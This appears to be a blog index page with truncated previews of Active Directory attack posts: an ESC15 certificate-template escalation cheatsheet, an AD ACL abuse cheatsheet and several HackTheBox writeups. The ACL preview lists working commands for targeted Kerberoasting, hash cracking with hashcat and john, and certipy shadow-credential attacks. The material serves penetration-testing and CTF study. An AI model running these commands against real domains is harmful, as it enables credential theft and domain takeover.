ESC15 Offensive Deep-Dive Cheatsheet 2025 - Vietnamese Language
ESC15 (aka EKUwu, CVE-2024-49019) is the fastest escalation vector in the current ADCS chain if you encounter a V1 template. It exploits the fact that V1 templates do NOT validate Application Policies (OID 1.3.6.1.4.1.311) in the CSR, which allows injecting an arbitrary EKU/OID (such as Certificate Request Agent or Client Auth) to override the original EKU (usually only Server Auth). Result: Low-priv user → impersonate DA/krbtgt → dump NTLM hash/DCSync in <60s. Why OP? Easier than ESC1 (no need for a pre-existing Clien...
AD ACLs Cheatsheet
GenericWrite on User: Update object’s attributes. Targeted Kerberoasting: targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user; hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force; john <hash_file> --wordlist=rockyou.txt. ShadowCredentials: certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip. Using Kerberos: certipy shadow auto -username username@domain -k -account target_user -dc-ip ip. GenericALL Ful...
HackTheBox - RustyKey Writeup
Introduction. Purpose: The purpose of this assessment is to evaluate the security of the RustyKey domain by simulating a real-world cyber attack. The goal is to identify vulnerabilities that malicious attackers could exploit to gain unauthorized access, escalate privileges, and compromise sensitive information, thereby providing detailed information about the security weaknesses of the environment. Scope and Objectives: The scope of the assessment is limited to the RustyKey domain, a simulated env...
HackTheBox - Voleur Writeup
Introduction: This writeup details the exploitation of the “Voleur” machine from Hack The Box. The primary objectives were to gain unauthorized access, escalate privileges, and retrieve sensitive data, specifically the user and root flags, to evaluate the security posture of the environment. Attack Narrative: This section provides a detailed account of the red team’s actions, outlining the sequence of events that led to the successful compromise of the Voleur domain. Each step is described with ...
HackTheBox - Artificial Writeup
Introduction: This writeup details the exploitation of the “Artificial” machine from Hack The Box, which showcases interesting vectors involving AI model manipulation and service exploitation. Attack Narrative: This section provides a detailed account of the red team’s actions, outlining the sequence of events that led to the successful compromise of the Artificial domain. Each step is described with its technical execution and significance. Initial Enumeration: First, let’s start with a comprehen...









